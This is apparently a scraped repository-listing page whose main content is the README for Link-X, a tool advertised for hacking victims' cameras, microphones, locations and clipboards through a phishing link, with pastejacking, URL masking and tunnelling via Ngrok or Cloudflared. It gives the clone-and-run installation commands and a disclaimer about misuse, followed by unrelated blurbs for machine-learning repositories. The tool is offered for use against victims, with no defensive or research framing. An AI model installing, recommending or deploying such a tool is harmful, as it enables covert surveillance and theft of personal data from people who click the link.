Hack Camera, Microphone, Location, Clipboard With Just a Link. Also, Get Many Details About Victim's Device. And So On...

Related tags

Deep LearningLink-X
Overview

Link-X

An Automated Tool to Hack Victim's Camera, Microphone, Location, Clipboard. Has 2 Extra Features.

Version 1.1 Update

  • Fixed Some Major Bugs
  • Data Saving Directory Changed To Storage Folder

    Features

  • Hack Camera
  • Hack Microphone
  • Hack Clipboard
  • Hack Location
  • Get So Many Details about Victim's Device. As much as Possible...
  • Prank Victim Using PasteJacking
  • Supports Custom HTML page to Show to Victim.
  • Supports URL Masking

    Supported Port Forwardings

  • Localhost
  • CloudFlared
  • Ngrok

    Installation Commands

    apt update -y
    apt upgrade -y
    pkg install python git -y
    git clone https://github.com/Toxic-Noob/Link-X
    cd Link-X
    bash setup.sh
    python link-x.py
    

    Note

    [*] USE IT, AT YOUR OWN RISK

    [*] ToxicNoob is not Responsible for Any Misuse

    Contact

    [*] Contact with Me via Email

    [email protected]

    Tool ScreenShots :

    Link-X 1 Link-X 2 Link-X 3 Link-X 4

    Visitors :

    Visitor Count

  • Owner
    ToxicNoob
    From an Ordinary country, I'm an Extraordinary Person.
    ToxicNoob
    Only works with the dashboard version / branch of jesse

    Jesse optuna Only works with the dashboard version / branch of jesse. The config.yml should be self-explainatory. Installation # install from git pip

    Markus K. 8 Dec 04, 2022
    PyTorch and Tensorflow functional model definitions

    functional-zoo Model definitions and pretrained weights for PyTorch and Tensorflow PyTorch, unlike lua torch, has autograd in it's core, so using modu

    Sergey Zagoruyko 590 Dec 22, 2022
    Code for Learning Manifold Patch-Based Representations of Man-Made Shapes, in ICLR 2021.

    LearningPatches | Webpage | Paper | Video Learning Manifold Patch-Based Representations of Man-Made Shapes Dmitriy Smirnov, Mikhail Bessmeltsev, Justi

    Dima Smirnov 22 Nov 14, 2022
    On the model-based stochastic value gradient for continuous reinforcement learning

    On the model-based stochastic value gradient for continuous reinforcement learning This repository is by Brandon Amos, Samuel Stanton, Denis Yarats, a

    Facebook Research 46 Dec 15, 2022
    SmoothGrad implementation in PyTorch

    SmoothGrad implementation in PyTorch PyTorch implementation of SmoothGrad: removing noise by adding noise. Vanilla Gradients SmoothGrad Guided backpro

    SSKH 143 Jan 05, 2023
    :fire: 2D and 3D Face alignment library build using pytorch

    Face Recognition Detect facial landmarks from Python using the world's most accurate face alignment network, capable of detecting points in both 2D an

    Adrian Bulat 6k Dec 31, 2022
    Adapter-BERT: Parameter-Efficient Transfer Learning for NLP.

    Adapter-BERT: Parameter-Efficient Transfer Learning for NLP.

    Google Research 340 Jan 03, 2023
    Implementation of H-Transformer-1D, Hierarchical Attention for Sequence Learning

    H-Transformer-1D Implementation of H-Transformer-1D, Transformer using hierarchical Attention for sequence learning with subquadratic costs. For now,

    Phil Wang 123 Nov 17, 2022
    This is a simple plugin for Vim that allows you to use OpenAI Codex.

    🤖 Vim Codex An AI plugin that does the work for you. This is a simple plugin for Vim that will allow you to use OpenAI Codex. To use this plugin you

    Tom Dörr 195 Dec 28, 2022
    3D dataset of humans Manipulating Objects in-the-Wild (MOW)

    MOW dataset [Website] This repository maintains our 3D dataset of humans Manipulating Objects in-the-Wild (MOW). The dataset contains 512 images in th

    Zhe Cao 28 Nov 06, 2022
    Weakly Supervised Text-to-SQL Parsing through Question Decomposition

    Weakly Supervised Text-to-SQL Parsing through Question Decomposition The official repository for the paper "Weakly Supervised Text-to-SQL Parsing thro

    14 Dec 19, 2022
    Deep universal probabilistic programming with Python and PyTorch

    Getting Started | Documentation | Community | Contributing Pyro is a flexible, scalable deep probabilistic programming library built on PyTorch. Notab

    7.7k Dec 30, 2022
    MILK: Machine Learning Toolkit

    MILK: MACHINE LEARNING TOOLKIT Machine Learning in Python Milk is a machine learning toolkit in Python. Its focus is on supervised classification with

    Luis Pedro Coelho 610 Dec 14, 2022
    The repository includes the code for training cell counting applications. (Keras + Tensorflow)

    cell_counting_v2 The repository includes the code for training cell counting applications. (Keras + Tensorflow) Dataset can be downloaded here : http:

    Weidi 113 Oct 06, 2022
    MNE: Magnetoencephalography (MEG) and Electroencephalography (EEG) in Python

    MNE-Python MNE-Python software is an open-source Python package for exploring, visualizing, and analyzing human neurophysiological data such as MEG, E

    MNE tools for MEG and EEG data analysis 2.1k Dec 28, 2022
    Tutorials, assignments, and competitions for MIT Deep Learning related courses.

    MIT Deep Learning This repository is a collection of tutorials for MIT Deep Learning courses. More added as courses progress. Tutorial: Deep Learning

    Lex Fridman 9.5k Jan 07, 2023
    Graph Convolutional Networks for Temporal Action Localization (ICCV2019)

    Graph Convolutional Networks for Temporal Action Localization This repo holds the codes and models for the PGCN framework presented on ICCV 2019 Graph

    Runhao Zeng 318 Dec 06, 2022
    A Momentumized, Adaptive, Dual Averaged Gradient Method for Stochastic Optimization

    MADGRAD Optimization Method A Momentumized, Adaptive, Dual Averaged Gradient Method for Stochastic Optimization pip install madgrad Try it out! A best

    Meta Research 774 Dec 31, 2022
    GradAttack is a Python library for easy evaluation of privacy risks in public gradients in Federated Learning

    GradAttack is a Python library for easy evaluation of privacy risks in public gradients in Federated Learning, as well as corresponding mitigation strategies.

    129 Dec 30, 2022
    A PyTorch Implementation of SphereFace.

    SphereFace A PyTorch Implementation of SphereFace. The code can be trained on CASIA-Webface and the best accuracy on LFW is 99.22%. SphereFace: Deep H

    carwin 685 Dec 09, 2022